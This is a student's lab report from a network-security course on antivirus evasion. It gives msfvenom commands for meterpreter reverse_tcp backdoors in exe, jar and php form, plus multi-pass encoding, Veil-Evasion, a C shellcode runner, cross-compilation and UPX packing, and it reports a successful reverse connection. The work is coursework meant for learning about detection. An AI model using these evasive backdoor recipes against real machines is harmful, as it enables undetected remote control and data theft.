2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践

---

一、实践目标

• 1.1 正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，加壳工具，使用shellcode编程

• 1.2 通过组合应用各种技术实现恶意代码免杀

• 1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（因为Win10的自带实时监控杀毒墙，一运行文件就自动删除，所以没有做这个加分项）

---

二、基础知识

• 免杀

一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。

要做好免杀，就时清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。

反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础。

---

三、Exp3.1 正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

实验步骤：

• 正确使用msf编码器，生成exe文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikataga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe >fenix.exe

• 使用virscan进行扫描，结果如下所示：
  
  

• 使用msf编码器对后门程序编码10次
  
  

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe > met-encoded.exe

• 上传到virus total试试免杀操作是否有效
  
  

• 使用Java后门程序生成命令

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.137.1 lport=5237 x> 20165237_backdoor_java.jar

• 使用php后门程序生成命令

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.153.135 lport=443 x> 20165237_backdoor.php

• 使用veil

use evasion

use 7

set Lhost 192.168.153.135

set Lport 5237

• 然后再输入后门程序的文件名：payload5237
  
  

• 用virscan看看查杀表现：
  
  

---

四、Exp3.2Linux平台交叉编译Windows应用

实验原理

• 执行shellcode生成命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.135 LPORT=5237 -f c

• 新建20165237.c文件，并且将下列代码输入：

unsigned char buf[] =

此处省略。

int main()

{

    int (*func)() = (int(*)())buf;

    func();

}

• 使用命令：

i686-w64-mingw32-g++ 20165237.c -o 20165237.exe

编译这个.c文件为可执行文件;

• 检测结果：
  
  

• 然后把它挂上virus total测一下：
  
  

• 加压缩壳：

upx 20165237.exe -o 20165237plus.exe

• 使用杀软扫描桌面文件，没有报警
  
  

• 运行后门程序，反弹连接成功
  
  

• （由于Win10自带的windows defendedr有强制实时监测，所以当点开恶意程序时直接被删除，导致无法回连。。想加分都加不了）

---

五、实验感想与问题

• 1、杀软是如何检测出恶意代码的？

  答：基于特征码：杀软会将恶意代码中有明显特征的一部分作为特征码，并建立起特征库，在检测时则比对特征码是否匹配。
  
  基于行为：杀软会监控运行的程序，像进行修改系统注册表、启动项等可疑操作的的程序就可能是恶意代码。

• 2、免杀是做什么？
  
  答：让后门程序不被杀软检测出来

• 3、免杀的基本方法有哪些？
  
  答：msfvenom直接生成、msfvenom多次编码、Veil-evasion、C+shellcode、UPX压缩壳、Hyperion

• 感想：
  
  答：这次实验让我感受到其实杀毒软件只能杀很常规的病毒或者恶意程序，虽然病毒库在持续更新，但是总会有未被查出的恶意软件或者恶意代码进入到自己的计算机，有一天破坏电脑数据。所以以后一定要注意安全上网，不要访问非法网站或者点开非法连接，说不定点开就会导致恶意软件的启动，从而被盗取计算机中的信息！

---

2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践的更多相关文章

1. 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践

   2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...

2. 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践

   2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

3. 2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践

   2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

4. 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践

   2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

5. 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践

   2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...

6. 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践

   2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

7. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

   - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

8. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

   2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

9. 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践

   2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

随机推荐

1. MyEclipse Spring 学习总结三 SpringMVC

   MyEclipse Spring 学习总结三 SpringMVC 一.SpringMVC原理 1.Springmvc 框架介绍 1)Spring 框架停工了构建Web应用程序的全功能MVC模块.Spr ...

2. CRF&plus;&plus;使用小结

   1. 简述 最近要应用CRF模型,进行序列识别.选用了CRF++工具包,具体来说是在VS2008的C#环境下,使用CRF++的windows版本.本文总结一下了解到的和CRF++工具包相关的信息. 参 ...

3. python学习资料

   http://woodpecker.org.cn/diveintopython/ http://www.cnblogs.com/txw1958/archive/2012/12/10/A_Byte_of ...

4. 【问题解决方案】之 关于某江加密视频swf专用播放器仍无法播放的问题

   前言: 从pt上下载了一些语言学习的视频之后一直打不开,百度谷歌了若干种方法仍然无解.无奈放弃. 某日从百度知道里又看到一个方法,试了一下,居然灵了.呜呼哀哉.赶紧记下来. 原方法链接:https:/ ...

5. Spark思维导图之Shuffle

6. vue v-for的数组改变导致页面不渲染解决方法

   直接在数组里,改变数组来达到重新渲染页面的目的, 需要用push等数组方法, 或者$set(),或者给数组重新赋值,来改变数组引用地址 而是直接索引= <body> <div id= ...

7. CSS属性disabled和readonly的区别是什么

   在博客园中看到这样一篇文章,关于disabled和readonly的区别,以前还真的没有注意它们的区别,还是有必要知道它们的区别的,所以转载了. 这两个属性有类似之处,但是区别也是巨大的,之所以说类似 ...

8. 无法下载apk等格式的文件的解决方案---ASP &period;NET Core 2&period;0 MVC 发布到IIS上以后无法下载apk等格式的文件的解决方案

   ASP .NET Core MVC 发布到  IIS 上以后 无法下载apk等格式的文件 使用.NET Core MVC创建了一个站点,其他文件可以下载,但是后来又需求,就把手机端的apk合适的文件上 ...

9. window JNI&lowbar;CreateJavaVM启动java程序

   https://blog.csdn.net/earbao/article/details/51889605 #define _CRT_SECURE_NO_WARNINGS 1       #inclu ...

10. Sublime Text 3（中文）添加Lua编译环境

    Sublime Text 3(中文)添加Lua编译环境 本文提供全流程,中文翻译.Chinar坚持将简单的生活方式,带给世人!(拥有更好的阅读体验 -- 高分辨率用户请根据需求调整网页缩放比例) 没有 ...